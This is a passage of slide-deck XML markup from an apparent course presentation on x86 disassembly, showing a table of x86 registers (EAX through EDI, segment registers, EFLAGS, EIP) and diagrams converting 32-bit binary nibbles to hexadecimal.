                        <a:rPr lang="en-GB" sz="1800"/>
                        <a:t>42 00 00 00</a:t>
                      </a:r>
                      <a:endParaRPr sz="1800"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="45725" marB="45725" marR="91450" marL="91450"/>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76"/>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X86 Disassembly</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="760" name="Google Shape;760;p76"/>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152400" lvl="0" marL="342900" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="3000"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="761" name="Google Shape;761;p76"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="0" l="0" r="0" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="693363" y="1844824"/>
            <a:ext cx="7757276" cy="392886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77"/>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X86 Disassembly</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="768" name="Google Shape;768;p77"/>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Registers</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>: a small amount of data storage in CPU</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-152400" lvl="0" marL="342900" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="3000"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="769" name="Google Shape;769;p77"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="1547664" y="2276872"/>
          <a:ext cx="3000000" cy="3000000"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr bandRow="1" firstRow="1">
                <a:noFill/>
                <a:tableStyleId>{D86BE483-798B-4F8A-A1FD-F16CD49BAE18}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="1744800"/>
                <a:gridCol w="1524000"/>
                <a:gridCol w="1524000"/>
                <a:gridCol w="1524000"/>
              </a:tblGrid>
              <a:tr h="370850">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1800"/>
                        <a:t>General register</a:t>
                      </a:r>
                      <a:endParaRPr sz="1800"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="45725" marB="45725" marR="91450" marL="91450"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1800"/>
                        <a:t>Segment register</a:t>
                      </a:r>
                      <a:endParaRPr sz="1800"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="45725" marB="45725" marR="91450" marL="91450"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1800"/>
                        <a:t>Status register</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1800"/>
                        <a:t> (flag)</a:t>
                      </a:r>
                      <a:endParaRPr sz="1800"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="45725" marB="45725" marR="91450" marL="91450"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1800"/>
                        <a:t>Instruction pointer</a:t>
                      </a:r>
                      <a:endParaRPr sz="1800"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="45725" marB="45725" marR="91450" marL="91450"/>
                </a:tc>
              </a:tr>
              <a:tr h="370850">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1800"/>
                        <a:t>EAX (AX,AH, AL)</a:t>
                      </a:r>
                      <a:endParaRPr sz="1800"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="45725" marB="45725" marR="91450" marL="91450"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1800"/>
                        <a:t>CS</a:t>
                      </a:r>
                      <a:endParaRPr sz="1800"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="45725" marB="45725" marR="91450" marL="91450"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1800"/>
                        <a:t>EFLAGS</a:t>
                      </a:r>
                      <a:endParaRPr sz="1800"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="45725" marB="45725" marR="91450" marL="91450"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1800"/>
                        <a:t>EIP</a:t>
                      </a:r>
                      <a:endParaRPr sz="1800"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="45725" marB="45725" marR="91450" marL="91450"/>
                </a:tc>
              </a:tr>
              <a:tr h="370850">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1800"/>
                        <a:t>EBX (BX, BH, BL)</a:t>
                      </a:r>
                      <a:endParaRPr sz="1800"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="45725" marB="45725" marR="91450" marL="91450"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1800"/>
                        <a:t>SS</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GB" sz="1800"/>
                        <a:t>ECX (CX, CH, CL)</a:t>
                      </a:r>
                      <a:endParaRPr sz="1800"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="45725" marB="45725" marR="91450" marL="91450"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1800"/>
                        <a:t>DS</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GB" sz="1800"/>
                        <a:t>EDX (DX, DH, DL)</a:t>
                      </a:r>
                      <a:endParaRPr sz="1800"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="45725" marB="45725" marR="91450" marL="91450"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1800"/>
                        <a:t>ES</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GB" sz="1800"/>
                        <a:t>EBP (BP)</a:t>
                      </a:r>
                      <a:endParaRPr sz="1800"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="45725" marB="45725" marR="91450" marL="91450"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1800"/>
                        <a:t>FS</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GB" sz="1800"/>
                        <a:t>ESP (SP)</a:t>
                      </a:r>
                      <a:endParaRPr sz="1800"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="45725" marB="45725" marR="91450" marL="91450"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1800"/>
                        <a:t>GS</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GB" sz="1800"/>
                        <a:t>ESI (SI)</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70850">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1800"/>
                        <a:t>EDI (DI)</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78"/>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Registers</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="775" name="Google Shape;775;p78"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4844605" y="3356992"/>
            <a:ext cx="3039763" cy="792088"/>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6" name="Google Shape;776;p78"/>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X86 Disassembly</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="777" name="Google Shape;777;p78"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1763688" y="1772816"/>
            <a:ext cx="6120680" cy="792088"/>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8" name="Google Shape;778;p78"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1907704" y="1845694"/>
            <a:ext cx="72531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Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>1010</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1800">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>A</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="779" name="Google Shape;779;p78"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2634846" y="1841262"/>
            <a:ext cx="72531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Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>1001</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1800">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>9</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="780" name="Google Shape;780;p78"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3360163" y="1826748"/>
            <a:ext cx="72531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Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>1101</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1800">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>D</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="781" name="Google Shape;781;p78"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4103782" y="1846565"/>
            <a:ext cx="72531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Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>1100</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1800">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>C</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="782" name="Google Shape;782;p78"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4842486" y="1856994"/>
            <a:ext cx="72531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Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>1000</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1800">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>8</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="783" name="Google Shape;783;p78"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5567803" y="1856994"/>
            <a:ext cx="72531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Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>0001</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB"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784" name="Google Shape;784;p78"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6295239" y="1841262"/>
            <a:ext cx="72531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Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>1111</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1800">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>F</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="785" name="Google Shape;785;p78"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7020556" y="1846565"/>
            <a:ext cx="72531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Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>0101</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1800">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>5</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="786" name="Google Shape;786;p78"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="683568" y="1988840"/>
            <a:ext cx="8130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32 bits</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="787" name="Google Shape;787;p78"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4844605" y="3501008"/>
            <a:ext cx="72531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Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>1000</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1800">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>8</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="788" name="Google Shape;788;p78"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5569922" y="3501008"/>
            <a:ext cx="72531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Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>0001</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB"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789" name="Google Shape;789;p78"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6297358" y="3485276"/>
            <a:ext cx="72531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Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>1111</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1800">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>F</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="790" name="Google Shape;790;p78"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7022675" y="3502749"/>
            <a:ext cx="72531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Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>0101</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1800">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
